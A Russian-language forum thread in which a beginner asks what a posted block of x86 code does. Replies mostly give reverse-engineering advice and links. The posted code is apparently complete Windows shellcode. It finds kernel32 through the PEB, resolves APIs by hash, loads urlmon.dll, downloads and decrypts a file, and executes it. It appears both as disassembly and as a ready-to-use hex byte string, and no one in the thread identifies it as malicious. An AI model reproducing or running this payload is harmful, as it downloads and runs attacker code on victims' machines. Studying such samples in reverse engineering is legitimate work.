Помогите разобраться в инструкциях

Ассемблер только начал изучать. Мнемонических команд знаю пока не много, поэтому прошу разказать что делает этот код(возможно это бесмыслица, код преобразовал из вида 0х**\...):

Код (Text):

1. 0x00000000  0x00000000  0x64,0xa1,0x18,0x00,    mov eax,dword ptr [0x18]
2. 0x00000006  0x00000006  0x8b,0x40,0x30  mov eax,dword ptr [eax+0x30]
3. 0x00000009  0x00000009  0x8b,0x40,0x54  mov eax,dword ptr [eax+0x54]
4. 0x0000000c  0x0000000c  0x8b,0x40,0x04  mov eax,dword ptr [eax+0x4]
5. 0x0000000f  0x0000000f  0x8b,0x40,0x04  mov eax,dword ptr [eax+0x4]
6. 0x00000012  0x00000012  0x8b,0x40,0x04  mov eax,dword ptr [eax+0x4]
7. 0x00000015  0x00000015  0x0d,0x20,0x00,0x20,    or  eax,0x200020
8. 0x0000001a  0x0000001a  0x3d,0x7c,0x00,0x77,    cmp eax,0x77007c
9. 0x0000001f  0x0000001f  0x74,0x01   jz  0x22
10. 0x00000021  0x00000021  0xc3    ret eip,esp
11. 0x00000022  0x00000022  0x33,0xc0   xor eax,eax
12. 0x00000024  0x00000024  0x64,0x8b,0x40,0x30 mov eax,dword ptr [eax+0x30]
13. 0x00000028  0x00000028  0x78,0x0c   js  0x36
14. 0x0000002a  0x0000002a  0x8b,0x40,0x0c  mov eax,dword ptr [eax+0xc]
15. 0x0000002d  0x0000002d  0x8b,0x70,0x1c  mov esi,dword ptr [eax+0x1c]
16. 0x00000030  0x00000030  0xad    lodsd   eax,dword ptr ds:[esi]
17. 0x00000031  0x00000031  0x8b,0x58,0x08  mov ebx,dword ptr [eax+0x8]
18. 0x00000034  0x00000034  0xeb,0x09   jmp 0x3f
19. 0x00000036  0x00000036  0x8b,0x40,0x34  mov eax,dword ptr [eax+0x34]
20. 0x00000039  0x00000039  0x8d,0x40,0x7c  lea eax,dword ptr [eax+0x7c]
21. 0x0000003c  0x0000003c  0x8b,0x58,0x3c  mov ebx,dword ptr [eax+0x3c]
22. 0x0000003f  0x0000003f  0x6a,0x4e   push    0x4e    esp
23. 0x00000041  0x00000041  0x5a    pop edx esp
24. 0x00000042  0x00000042  0xd1,0xe2   shl edx,0x1
25. 0x00000044  0x00000044  0x2b,0xe2   sub esp,edx
26. 0x00000046  0x00000046  0x8b,0xec   mov ebp,esp
27. 0x00000048  0x00000048  0xc7,0x45,0x10,0x6e,    mov dword ptr [ebp+0x10],0x7865
28. 0x0000004f  0x0000004f  0xc7,0x45,0x14,0xff,    mov dword ptr [ebp+0x14],0x1ff
29. 0x00000056  0x00000056  0xc7,0x45,0x00,0x00,    mov dword ptr [ebp],0x0
30. 0x0000005d  0x0000005d  0xeb,0x4f   jmp 0xae
31. 0x0000005f  0x0000005f  0x5a    pop edx esp
32. 0x00000060  0x00000060  0x52    push    edx esp
33. 0x00000061  0x00000061  0x83,0xea,0x56  sub edx,0x56
34. 0x00000064  0x00000064  0x89,0x55,0x18  mov dword ptr [ebp+0x18],edx
35. 0x00000067  0x00000067  0x56    push    esi esp
36. 0x00000068  0x00000068  0x57    push    edi esp
37. 0x00000069  0x00000069  0x8b,0x73,0x3c  mov esi,dword ptr [ebx+0x3c]
38. 0x0000006c  0x0000006c  0x8b,0x74,0x33,0x78 mov esi,dword ptr [ebx+esi+0x78
39. 0x00000070  0x00000070  0x03,0xf3   add esi,ebx
40. 0x00000072  0x00000072  0x56    push    esi esp
41. 0x00000073  0x00000073  0x8b,0x76,0x20  mov esi,dword ptr [esi+0x20]
42. 0x00000076  0x00000076  0x03,0xf3   add esi,ebx
43. 0x00000078  0x00000078  0x33,0xc9   xor ecx,ecx
44. 0x0000007a  0x0000007a  0x49    dec ecx
45. 0x0000007b  0x0000007b  0x50    push    eax esp
46. 0x0000007c  0x0000007c  0x41    inc ecx
47. 0x0000007d  0x0000007d  0xad    lodsd   eax,dword ptr ds:[esi]
48. 0x0000007e  0x0000007e  0x33,0xff   xor edi,edi
49. 0x00000080  0x00000080  0x36,0x0f,0xbe,0x14,    movsx   edx,byte ptr [ebx+eax]
50. 0x00000085  0x00000085  0x38,0xf2   cmp dl,dh
51. 0x00000087  0x00000087  0x74,0x08   jz  0x91
52. 0x00000089  0x00000089  0xc1,0xcf,0x0d  ror edi,0xd
53. 0x0000008c  0x0000008c  0x03,0xfa   add edi,edx
54. 0x0000008e  0x0000008e  0x40    inc eax
55. 0x0000008f  0x0000008f  0xeb,0xef   jmp 0x80
56. 0x00000091  0x00000091  0x58    pop eax esp
57. 0x00000092  0x00000092  0x3b,0xf8   cmp edi,eax
58. 0x00000094  0x00000094  0x75,0xe5   jnz 0x7b
59. 0x00000096  0x00000096  0x5e    pop esi esp
60. 0x00000097  0x00000097  0x8b,0x46,0x24  mov eax,dword ptr [esi+0x24]
61. 0x0000009a  0x0000009a  0x03,0xc3   add eax,ebx
62. 0x0000009c  0x0000009c  0x66,0x8b,0x0c,0x48 mov cx,word ptr [eax+ecx*2]
63. 0x000000a0  0x000000a0  0x8b,0x56,0x1c  mov edx,dword ptr [esi+0x1c]
64. 0x000000a3  0x000000a3  0x03,0xd3   add edx,ebx
65. 0x000000a5  0x000000a5  0x8b,0x04,0x8a  mov eax,dword ptr [edx+ecx*4]
66. 0x000000a8  0x000000a8  0x03,0xc3   add eax,ebx
67. 0x000000aa  0x000000aa  0x5f    pop edi esp
68. 0x000000ab  0x000000ab  0x5e    pop esi esp
69. 0x000000ac  0x000000ac  0x50    push    eax esp
70. 0x000000ad  0x000000ad  0xc3    ret eip,esp
71. 0x000000ae  0x000000ae  0x8d,0x7d,0x1c  lea edi,dword ptr [ebp+0x1c]
72. 0x000000b1  0x000000b1  0x57    push    edi esp
73. 0x000000b2  0x000000b2  0x52    push    edx esp
74. 0x000000b3  0x000000b3  0xb8,0x33,0xca,0x8a,    mov eax,0x5b8aca33
75. 0x000000b8  0x000000b8  0xe8,0xa2,0xff,0xff,    call    0x5f    eip,esp
76. 0x000000bd  0x000000bd  0x32,0xc0   xor al,al
77. 0x000000bf  0x000000bf  0x8b,0xf7   mov esi,edi
78. 0x000000c1  0x000000c1  0xf2,0xae   scasb   al,byte ptr es:[edi]
79. 0x000000c3  0x000000c3  0x4f    dec edi
80. 0x000000c4  0x000000c4  0x8b,0x45,0x10  mov eax,dword ptr [ebp+0x10]
81. 0x000000c7  0x000000c7  0xab    stosd   dword ptr es:[edi],eax
82. 0x000000c8  0x000000c8  0x66,0x98   cwde    ax,eax
83. 0x000000ca  0x000000ca  0x66,0xab   stosd   word ptr es:[edi],ax
84. 0x000000cc  0x000000cc  0x33,0xc0   xor eax,eax
85. 0x000000ce  0x000000ce  0xb8,0x61,0x64,0x00,    mov eax,0x6461
86. 0x000000d3  0x000000d3  0x50    push    eax esp
87. 0x000000d4  0x000000d4  0x68,0x54,0x68,0x72,    push    0x65726854  esp
88. 0x000000d9  0x000000d9  0x35,0x24,0x1c,0x69,    xor eax,0x74691c24
89. 0x000000de  0x000000de  0x50    push    eax esp
90. 0x000000df  0x000000df  0x54    push    esp esp
91. 0x000000e0  0x000000e0  0x53    push    ebx esp
92. 0x000000e1  0x000000e1  0xb8,0xaa,0xfc,0x0d,    mov eax,0x7c0dfcaa
93. 0x000000e6  0x000000e6  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
94. 0x000000e9  0x000000e9  0x83,0xc4,0x0c  add esp,0xc
95. 0x000000ec  0x000000ec  0x50    push    eax esp
96. 0x000000ed  0x000000ed  0xb0,0x6c   mov al,0x6c
97. 0x000000ef  0x000000ef  0x8a,0xe0   mov ah,al
98. 0x000000f1  0x000000f1  0x98    cwde    ax,eax
99. 0x000000f2  0x000000f2  0x50    push    eax esp
100. 0x000000f3  0x000000f3  0x68,0x6f,0x6e,0x2e,    push    0x642e6e6f  esp
101. 0x000000f8  0x000000f8  0x68,0x75,0x72,0x6c,    push    0x6d6c7275  esp
102. 0x000000fd  0x000000fd  0x54    push    esp esp
103. 0x000000fe  0x000000fe  0xb8,0x8e,0x4e,0x0e,    mov eax,0xec0e4e8e
104. 0x00000103  0x00000103  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
105. 0x00000106  0x00000106  0x83,0xc4,0x0c  add esp,0xc
106. 0x00000109  0x00000109  0x93    xchg    eax,ebx
107. 0x0000010a  0x0000010a  0x50    push    eax esp
108. 0x0000010b  0x0000010b  0x33,0xc0   xor eax,eax
109. 0x0000010d  0x0000010d  0x50    push    eax esp
110. 0x0000010e  0x0000010e  0x50    push    eax esp
111. 0x0000010f  0x0000010f  0x56    push    esi esp
112. 0x00000110  0x00000110  0x8b,0x55,0x18  mov edx,dword ptr [ebp+0x18]
113. 0x00000113  0x00000113  0x03,0x55,0x14  add edx,dword ptr [ebp+0x14]
114. 0x00000116  0x00000116  0x52    push    edx esp
115. 0x00000117  0x00000117  0x50    push    eax esp
116. 0x00000118  0x00000118  0xb8,0x36,0x1a,0x2f,    mov eax,0x702f1a36
117. 0x0000011d  0x0000011d  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
118. 0x00000120  0x00000120  0x5b    pop ebx esp
119. 0x00000121  0x00000121  0x83,0x7d,0x00,0x01 cmp dword ptr [ebp],0x1
120. 0x00000125  0x00000125  0x0f,0x85,0x9e,0x00,    jnz 0x1c9
121. 0x0000012b  0x0000012b  0x6a,0x00   push    0x0 esp
122. 0x0000012d  0x0000012d  0x68,0x80,0x00,0x00,    push    0x80    esp
123. 0x00000132  0x00000132  0x6a,0x03   push    0x3 esp
124. 0x00000134  0x00000134  0x6a,0x00   push    0x0 esp
125. 0x00000136  0x00000136  0x6a,0x03   push    0x3 esp
126. 0x00000138  0x00000138  0x68,0x00,0x00,0x00,    push    0xc0000000  esp
127. 0x0000013d  0x0000013d  0x56    push    esi esp
128. 0x0000013e  0x0000013e  0xb8,0xa5,0x17,0x00,    mov eax,0x7c0017a5
129. 0x00000143  0x00000143  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
130. 0x00000146  0x00000146  0x89,0x45,0x04  mov dword ptr [ebp+0x4],eax
131. 0x00000149  0x00000149  0x6a,0x04   push    0x4 esp
132. 0x0000014b  0x0000014b  0x68,0x00,0x10,0x00,    push    0x1000  esp
133. 0x00000150  0x00000150  0x68,0x00,0x00,0x08,    push    0x80000 esp
134. 0x00000155  0x00000155  0x6a,0x00   push    0x0 esp
135. 0x00000157  0x00000157  0xb8,0x54,0xca,0xaf,    mov eax,0x91afca54
136. 0x0000015c  0x0000015c  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
137. 0x0000015f  0x0000015f  0x89,0x45,0x0c  mov dword ptr [ebp+0xc],eax
138. 0x00000162  0x00000162  0x50    push    eax esp
139. 0x00000163  0x00000163  0x6a,0x00   push    0x0 esp
140. 0x00000165  0x00000165  0x8d,0x4d,0x08  lea ecx,dword ptr [ebp+0x8]
141. 0x00000168  0x00000168  0x51    push    ecx esp
142. 0x00000169  0x00000169  0x68,0x00,0x00,0x08,    push    0x80000 esp
143. 0x0000016e  0x0000016e  0x50    push    eax esp
144. 0x0000016f  0x0000016f  0xff,0x75,0x04  push    dword ptr [ebp+0x4] esp
145. 0x00000172  0x00000172  0xb8,0x16,0x65,0xfa,    mov eax,0x10fa6516
146. 0x00000177  0x00000177  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
147. 0x0000017a  0x0000017a  0x5f    pop edi esp
148. 0x0000017b  0x0000017b  0x8b,0x17   mov edx,dword ptr [edi]
149. 0x0000017d  0x0000017d  0x83,0xc7,0x04  add edi,0x4
150. 0x00000180  0x00000180  0x8b,0x4d,0x08  mov ecx,dword ptr [ebp+0x8]
151. 0x00000183  0x00000183  0x83,0xe9,0x04  sub ecx,0x4
152. 0x00000186  0x00000186  0xe8,0xa7,0x00,0x00,    call    0x232   eip,esp
153. 0x0000018b  0x0000018b  0x6a,0x00   push    0x0 esp
154. 0x0000018d  0x0000018d  0x6a,0x00   push    0x0 esp
155. 0x0000018f  0x0000018f  0x6a,0x00   push    0x0 esp
156. 0x00000191  0x00000191  0xff,0x75,0x04  push    dword ptr [ebp+0x4] esp
157. 0x00000194  0x00000194  0xb8,0xac,0x08,0xda,    mov eax,0x76da08ac
158. 0x00000199  0x00000199  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
159. 0x0000019c  0x0000019c  0x6a,0x00   push    0x0 esp
160. 0x0000019e  0x0000019e  0x8d,0x4d,0x08  lea ecx,dword ptr [ebp+0x8]
161. 0x000001a1  0x000001a1  0x51    push    ecx esp
162. 0x000001a2  0x000001a2  0xff,0x75,0x08  push    dword ptr [ebp+0x8] esp
163. 0x000001a5  0x000001a5  0xff,0x75,0x0c  push    dword ptr [ebp+0xc] esp
164. 0x000001a8  0x000001a8  0x83,0x04,0x24,0x04 add dword ptr [esp],0x4
165. 0x000001ac  0x000001ac  0xff,0x75,0x04  push    dword ptr [ebp+0x4] esp
166. 0x000001af  0x000001af  0xb8,0x1f,0x79,0x0a,    mov eax,0xe80a791f
167. 0x000001b4  0x000001b4  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
168. 0x000001b7  0x000001b7  0xff,0x75,0x04  push    dword ptr [ebp+0x4] esp
169. 0x000001ba  0x000001ba  0xb8,0xfb,0x97,0xfd,    mov eax,0xffd97fb
170. 0x000001bf  0x000001bf  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
171. 0x000001c2  0x000001c2  0xc7,0x45,0x00,0x02,    mov dword ptr [ebp],0x2
172. 0x000001c9  0x000001c9  0x57    push    edi esp
173. 0x000001ca  0x000001ca  0x56    push    esi esp
174. 0x000001cb  0x000001cb  0xb8,0x98,0xfe,0x8a,    mov eax,0xe8afe98
175. 0x000001d0  0x000001d0  0xff,0x55,0x18  call    dword ptr [ebp+0x18]    eip,esp
176. 0x000001d3  0x000001d3  0xeb,0x2a   jmp 0x1ff
177. 0x000001d5  0x000001d5  0x18,0x2a   sbb byte ptr [edx],ch
178. 0x000001d7  0x000001d7  0xf9    stc
179. 0x000001d8  0x000001d8  0xb7,0xd2   mov bh,0xd2
180. 0x000001da  0x000001da  0x77,0xb3   ja  0x18f
181. 0x000001dc  0x000001dc  0x01,0x45,0x8a  add dword ptr [ebp-0x76],eax
182. 0x000001df  0x000001df  0x92    xchg    eax,edx
183. 0x000001e0  0x000001e0  0xb7,0xad   mov bh,0xad
184. 0x000001e2  0x000001e2  0x50    push    eax esp
185. 0x000001e3  0x000001e3  0x5d    pop ebp esp
186. 0x000001e4  0x000001e4  0xe4,0x67   in  al,0x67
187. 0x000001e6  0x000001e6  0xf5    cmc
188. 0x000001e7  0x000001e7  0xe6,0xc7   out 0xc7,al
189. 0x000001e9  0x000001e9  0x1a,0xbf,0xab,0x1e,    sbb bh,byte ptr [edi+0x42101eab
190. 0x000001ef  0x000001ef  0x76,0xa2   jbe 0x193
191. 0x000001f1  0x000001f1  0xa1,0x54,0x63,0x09,    mov eax,dword ptr [0x7b096354]
192. 0x000001f6  0x000001f6  0x89,0xb0,0xf4,0x97,    mov dword ptr [eax+0x734e97f4],
193. 0x000001fc  0x000001fc  0x93    xchg    eax,ebx
194. 0x000001fd  0x000001fd  0x3f    aas
195. 0x000001fe  0x000001fe  0xf1
196. 0x000001ff  0x000001ff  0x83,0x7d,0x00,0x02 cmp dword ptr [ebp],0x2
197. 0x00000203  0x00000203  0x74,0x60   jz  0x265
198. 0x00000205  0x00000205  0xc7,0x45,0x00,0x01,    mov dword ptr [ebp],0x1
199. 0x0000020c  0x0000020c  0xc7,0x45,0x10,0x79,    mov dword ptr [ebp+0x10],0x7865
200. 0x00000213  0x00000213  0xc7,0x45,0x14,0x72,    mov dword ptr [ebp+0x14],0x172
201. 0x0000021a  0x0000021a  0x8b,0x7d,0x18  mov edi,dword ptr [ebp+0x18]
202. 0x0000021d  0x0000021d  0x03,0x7d,0x14  add edi,dword ptr [ebp+0x14]
203. 0x00000220  0x00000220  0xb9,0x26,0x00,0x00,    mov ecx,0x26
204. 0x00000225  0x00000225  0x8b,0x57,0xfc  mov edx,dword ptr [edi-0x4]
205. 0x00000228  0x00000228  0xe8,0x05,0x00,0x00,    call    0x232   eip,esp
206. 0x0000022d  0x0000022d  0xe9,0x7c,0xfe,0xff,    jmp 0xae
207. 0x00000232  0x00000232  0x33,0xc0   xor eax,eax
208. 0x00000234  0x00000234  0x8a,0x07   mov al,byte ptr [edi]
209. 0x00000236  0x00000236  0xd2,0xc8   ror al,cl
210. 0x00000238  0x00000238  0x32,0xc1   xor al,cl
211. 0x0000023a  0x0000023a  0xf6,0xd0   not al
212. 0x0000023c  0x0000023c  0x32,0xc5   xor al,ch
213. 0x0000023e  0x0000023e  0x32,0xc2   xor al,dl
214. 0x00000240  0x00000240  0x32,0xc6   xor al,dh
215. 0x00000242  0x00000242  0xd2,0xc0   rol al,cl
216. 0x00000244  0x00000244  0x02,0xc1   add al,cl
217. 0x00000246  0x00000246  0x02,0xc5   add al,ch
218. 0x00000248  0x00000248  0x02,0xc2   add al,dl
219. 0x0000024a  0x0000024a  0x02,0xc6   add al,dh
220. 0x0000024c  0x0000024c  0xd2,0xc8   ror al,cl
221. 0x0000024e  0x0000024e  0x2a,0xc1   sub al,cl
222. 0x00000250  0x00000250  0x2a,0xc5   sub al,ch
223. 0x00000252  0x00000252  0xf6,0xd0   not al
224. 0x00000254  0x00000254  0x2a,0xc2   sub al,dl
225. 0x00000256  0x00000256  0x2a,0xc6   sub al,dh
226. 0x00000258  0x00000258  0xd2,0xc0   rol al,cl
227. 0x0000025a  0x0000025a  0xd3,0xc2   rol edx,cl
228. 0x0000025c  0x0000025c  0x0f,0xca   bswap   edx
229. 0x0000025e  0x0000025e  0x88,0x07   mov byte ptr [edi],al
230. 0x00000260  0x00000260  0x47    inc edi
231. 0x00000261  0x00000261  0x49    dec ecx
232. 0x00000262  0x00000262  0x75,0xce   jnz 0x232
233. 0x00000264  0x00000264  0xc3    ret eip,esp
234. 0x00000265  0x00000265  0xc3    ret eip,esp

 

http://www.infanata.org/literature/prose/1146116495-idiot.html

 

если уж начинать реверсить то первым делом определить начальную точку(entry point)
как правило она указана в заголовке exe файла

возьмите для начала прогу попроще которая точно не запакована а то будете первые несколько лет изучать распаковщик

 

и если уж совем начинающий то для начала соберите стандартную привет мир
которая написана на каждом углу

 

Хочу такой же дизасм ) Где взять ?)

 

TbI_TyT
возьми какойнить который мусор пытается анализировать- hiew помнится тоже перлы выдавал на мусоре

 

http://www.hhdsoftware.com/Downloads/hex-editor-ultimate.html
С помощью каких средств можно получить правильную\корректную и читабельную мнемонику из этого кода?:

Код (Text):

1. "\x64\xA1\x18\x00\x00\x00\x8B\x40\x30\x8B\x40\x54\x8B\x40\x04\x8B".
2. "\x40\x04\x8B\x40\x04\x0D\x20\x00\x20\x00\x3D\x7C\x00\x77\x00\x74".
3. "\x01\xC3\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C".
4. "\xAD\x8B\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A".
5. "\x4E\x5A\xD1\xE2\x2B\xE2\x8B\xEC\xC7\x45\x10\x6E\x2E\x65\x78\xC7".
6. "\x45\x14\xFF\x01\x00\x00\xC7\x45\x00\x00\x00\x00\x00\xEB\x4F\x5A".
7. "\x52\x83\xEA\x56\x89\x55\x18\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78".
8. "\x03\xF3\x56\x8B\x76\x20\x03\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF".
9. "\x36\x0F\xBE\x14\x03\x38\xF2\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB".
10. "\xEF\x58\x3B\xF8\x75\xE5\x5E\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48".
11. "\x8B\x56\x1C\x03\xD3\x8B\x04\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D".
12. "\x1C\x57\x52\xB8\x33\xCA\x8A\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B".
13. "\xF7\xF2\xAE\x4F\x8B\x45\x10\xAB\x66\x98\x66\xAB\x33\xC0\xB8\x61".
14. "\x64\x00\x00\x50\x68\x54\x68\x72\x65\x35\x24\x1C\x69\x74\x50\x54".
15. "\x53\xB8\xAA\xFC\x0D\x7C\xFF\x55\x18\x83\xC4\x0C\x50\xB0\x6C\x8A".
16. "\xE0\x98\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E".
17. "\x4E\x0E\xEC\xFF\x55\x18\x83\xC4\x0C\x93\x50\x33\xC0\x50\x50\x56".
18. "\x8B\x55\x18\x03\x55\x14\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x18".
19. "\x5B\x83\x7D\x00\x01\x0F\x85\x9E\x00\x00\x00\x6A\x00\x68\x80\x00".
20. "\x00\x00\x6A\x03\x6A\x00\x6A\x03\x68\x00\x00\x00\xC0\x56\xB8\xA5".
21. "\x17\x00\x7C\xFF\x55\x18\x89\x45\x04\x6A\x04\x68\x00\x10\x00\x00".
22. "\x68\x00\x00\x08\x00\x6A\x00\xB8\x54\xCA\xAF\x91\xFF\x55\x18\x89".
23. "\x45\x0C\x50\x6A\x00\x8D\x4D\x08\x51\x68\x00\x00\x08\x00\x50\xFF".
24. "\x75\x04\xB8\x16\x65\xFA\x10\xFF\x55\x18\x5F\x8B\x17\x83\xC7\x04".
25. "\x8B\x4D\x08\x83\xE9\x04\xE8\xA7\x00\x00\x00\x6A\x00\x6A\x00\x6A".
26. "\x00\xFF\x75\x04\xB8\xAC\x08\xDA\x76\xFF\x55\x18\x6A\x00\x8D\x4D".
27. "\x08\x51\xFF\x75\x08\xFF\x75\x0C\x83\x04\x24\x04\xFF\x75\x04\xB8".
28. "\x1F\x79\x0A\xE8\xFF\x55\x18\xFF\x75\x04\xB8\xFB\x97\xFD\x0F\xFF".
29. "\x55\x18\xC7\x45\x00\x02\x00\x00\x00\x57\x56\xB8\x98\xFE\x8A\x0E".
30. "\xFF\x55\x18\xEB\x2A\x18\x2A\xF9\xB7\xD2\x77\xB3\x01\x45\x8A\x92".
31. "\xB7\xAD\x50\x5D\xE4\x67\xF5\xE6\xC7\x1A\xBF\xAB\x1E\x10\x42\x76".
32. "\xA2\xA1\x54\x63\x09\x7B\x89\xB0\xF4\x97\x4E\x73\x93\x3F\xF1\x83".
33. "\x7D\x00\x02\x74\x60\xC7\x45\x00\x01\x00\x00\x00\xC7\x45\x10\x79".
34. "\x2E\x65\x78\xC7\x45\x14\x72\x01\x00\x00\x8B\x7D\x18\x03\x7D\x14".
35. "\xB9\x26\x00\x00\x00\x8B\x57\xFC\xE8\x05\x00\x00\x00\xE9\x7C\xFE".
36. "\xFF\xFF\x33\xC0\x8A\x07\xD2\xC8\x32\xC1\xF6\xD0\x32\xC5\x32\xC2".
37. "\x32\xC6\xD2\xC0\x02\xC1\x02\xC5\x02\xC2\x02\xC6\xD2\xC8\x2A\xC1".
38. "\x2A\xC5\xF6\xD0\x2A\xC2\x2A\xC6\xD2\xC0\xD3\xC2\x0F\xCA\x88\x07".
39. "\x47\x49\x75\xCE\xC3\xC3".

 

http://www.litera.ru/stixiya/authors/griboedov/

 

Код (Text):

1. <ModuleEntryPoint>:
2.  
3. MOV EAX,DWORD PTR FS:[018h]
4. MOV EAX,DWORD PTR DS:[EAX+030h]
5. MOV EAX,DWORD PTR DS:[EAX+054h]
6. MOV EAX,DWORD PTR DS:[EAX+4]
7. MOV EAX,DWORD PTR DS:[EAX+4]
8. MOV EAX,DWORD PTR DS:[EAX+4]
9. OR EAX,0200020h
10. CMP EAX,077007Ch
11. JE @test_00401022                            ; test.00401022
12. RETN
13.  
14. @test_00401022:
15.  
16. XOR EAX,EAX
17. MOV EAX,DWORD PTR FS:[EAX+030h]
18. JS @test_00401036                            ; test.00401036
19. MOV EAX,DWORD PTR DS:[EAX+0Ch]
20. MOV ESI,DWORD PTR DS:[EAX+01Ch]
21. LODS DWORD PTR DS:[ESI]
22. MOV EBX,DWORD PTR DS:[EAX+8]
23. JMP @test_0040103F                           ; test.0040103F
24.  
25. @test_00401036:
26.  
27. MOV EAX,DWORD PTR DS:[EAX+034h]
28. LEA EAX,DWORD PTR DS:[EAX+07Ch]
29. MOV EBX,DWORD PTR DS:[EAX+03Ch]
30.  
31. @test_0040103F:
32.  
33. PUSH 04Eh
34. POP EDX
35. SHL EDX,1
36. SUB ESP,EDX
37. MOV EBP,ESP
38. MOV DWORD PTR SS:[EBP+010h],078652E6Eh
39. MOV DWORD PTR SS:[EBP+014h],01FFh
40. MOV DWORD PTR SS:[EBP],0
41. JMP @test_004010AE                           ; test.004010AE
42.  
43. @test_0040105F:                              ;<= Procedure Start
44.  
45. POP EDX
46. PUSH EDX
47. SUB EDX,056h
48. MOV DWORD PTR SS:[EBP+018h],EDX
49. PUSH ESI
50. PUSH EDI
51. MOV ESI,DWORD PTR DS:[EBX+03Ch]
52. MOV ESI,DWORD PTR DS:[EBX+ESI+078h]
53. ADD ESI,EBX
54. PUSH ESI
55. MOV ESI,DWORD PTR DS:[ESI+020h]
56. ADD ESI,EBX
57. XOR ECX,ECX
58. DEC ECX
59.  
60. @test_0040107B:
61.  
62. PUSH EAX
63. INC ECX
64. LODS DWORD PTR DS:[ESI]
65. XOR EDI,EDI
66.  
67. @test_00401080:
68.  
69. MOVSX EDX,BYTE PTR SS:[EBX+EAX]
70. CMP DL,DH
71. JE @test_00401091                            ; test.00401091
72. ROR EDI,0Dh
73. ADD EDI,EDX
74. INC EAX
75. JMP @test_00401080                           ; test.00401080
76.  
77. @test_00401091:
78.  
79. POP EAX
80. CMP EDI,EAX
81. JNZ @test_0040107B                           ; test.0040107B
82. POP ESI
83. MOV EAX,DWORD PTR DS:[ESI+024h]
84. ADD EAX,EBX
85. MOV CX,WORD PTR DS:[EAX+ECX*2]
86. MOV EDX,DWORD PTR DS:[ESI+01Ch]
87. ADD EDX,EBX
88. MOV EAX,DWORD PTR DS:[EDX+ECX*4]
89. ADD EAX,EBX
90. POP EDI
91. POP ESI
92. PUSH EAX
93. RETN                                         ;<= Procedure End
94.  
95.  
96. @test_004010AE:
97.  
98. LEA EDI,DWORD PTR SS:[EBP+01Ch]
99. PUSH EDI
100. PUSH EDX
101. MOV EAX,05B8ACA33h
102. CALL @test_0040105F                          ; test.0040105F
103. XOR AL,AL
104. MOV ESI,EDI
105. REPNE SCAS BYTE PTR ES:[EDI]
106. DEC EDI
107. MOV EAX,DWORD PTR SS:[EBP+010h]
108. STOS DWORD PTR ES:[EDI]
109. CBW
110. STOS WORD PTR ES:[EDI]
111. XOR EAX,EAX
112. MOV EAX,06461h
113. PUSH EAX
114. PUSH 065726854h
115. XOR EAX,074691C24h
116. PUSH EAX
117. PUSH ESP
118. PUSH EBX
119. MOV EAX,07C0DFCAAh
120. CALL DWORD PTR SS:[EBP+018h]
121. ADD ESP,0Ch
122. PUSH EAX
123. MOV AL,06Ch
124. MOV AH,AL
125. CWDE
126. PUSH EAX
127. PUSH 0642E6E6Fh
128. PUSH 06D6C7275h
129. PUSH ESP
130. MOV EAX,0EC0E4E8Eh
131. CALL DWORD PTR SS:[EBP+018h]
132. ADD ESP,0Ch
133. XCHG EAX,EBX
134. PUSH EAX
135. XOR EAX,EAX
136. PUSH EAX
137. PUSH EAX
138. PUSH ESI
139. MOV EDX,DWORD PTR SS:[EBP+018h]
140. ADD EDX,DWORD PTR SS:[EBP+014h]
141. PUSH EDX
142. PUSH EAX
143. MOV EAX,0702F1A36h
144. CALL DWORD PTR SS:[EBP+018h]
145. POP EBX
146. CMP DWORD PTR SS:[EBP],1
147. JNZ @test_004011C9                           ; test.004011C9
148. PUSH 0
149. PUSH 080h
150. PUSH 3
151. PUSH 0
152. PUSH 3
153. PUSH 0C0000000h
154. PUSH ESI
155. MOV EAX,07C0017A5h
156. CALL DWORD PTR SS:[EBP+018h]
157. MOV DWORD PTR SS:[EBP+4],EAX
158. PUSH 4
159. PUSH 01000h
160. PUSH 080000h
161. PUSH 0
162. MOV EAX,091AFCA54h
163. CALL DWORD PTR SS:[EBP+018h]
164. MOV DWORD PTR SS:[EBP+0Ch],EAX
165. PUSH EAX
166. PUSH 0
167. LEA ECX,DWORD PTR SS:[EBP+8]
168. PUSH ECX
169. PUSH 080000h
170. PUSH EAX
171. PUSH DWORD PTR SS:[EBP+4]
172. MOV EAX,010FA6516h
173. CALL DWORD PTR SS:[EBP+018h]
174. POP EDI
175. MOV EDX,DWORD PTR DS:[EDI]
176. ADD EDI,4
177. MOV ECX,DWORD PTR SS:[EBP+8]
178. SUB ECX,4
179. CALL @test_00401232                          ; test.00401232
180. PUSH 0
181. PUSH 0
182. PUSH 0
183. PUSH DWORD PTR SS:[EBP+4]
184. MOV EAX,076DA08ACh
185. CALL DWORD PTR SS:[EBP+018h]
186. PUSH 0
187. LEA ECX,DWORD PTR SS:[EBP+8]
188. PUSH ECX
189. PUSH DWORD PTR SS:[EBP+8]
190. PUSH DWORD PTR SS:[EBP+0Ch]
191. ADD DWORD PTR SS:[ESP],4
192. PUSH DWORD PTR SS:[EBP+4]
193. MOV EAX,0E80A791Fh
194. CALL DWORD PTR SS:[EBP+018h]
195. PUSH DWORD PTR SS:[EBP+4]
196. MOV EAX,0FFD97FBh
197. CALL DWORD PTR SS:[EBP+018h]
198. MOV DWORD PTR SS:[EBP],2
199.  
200. @test_004011C9:
201.  
202. PUSH EDI
203. PUSH ESI
204. MOV EAX,0E8AFE98h
205. CALL DWORD PTR SS:[EBP+018h]
206. JMP @test_004011FF                           ; test.004011FF
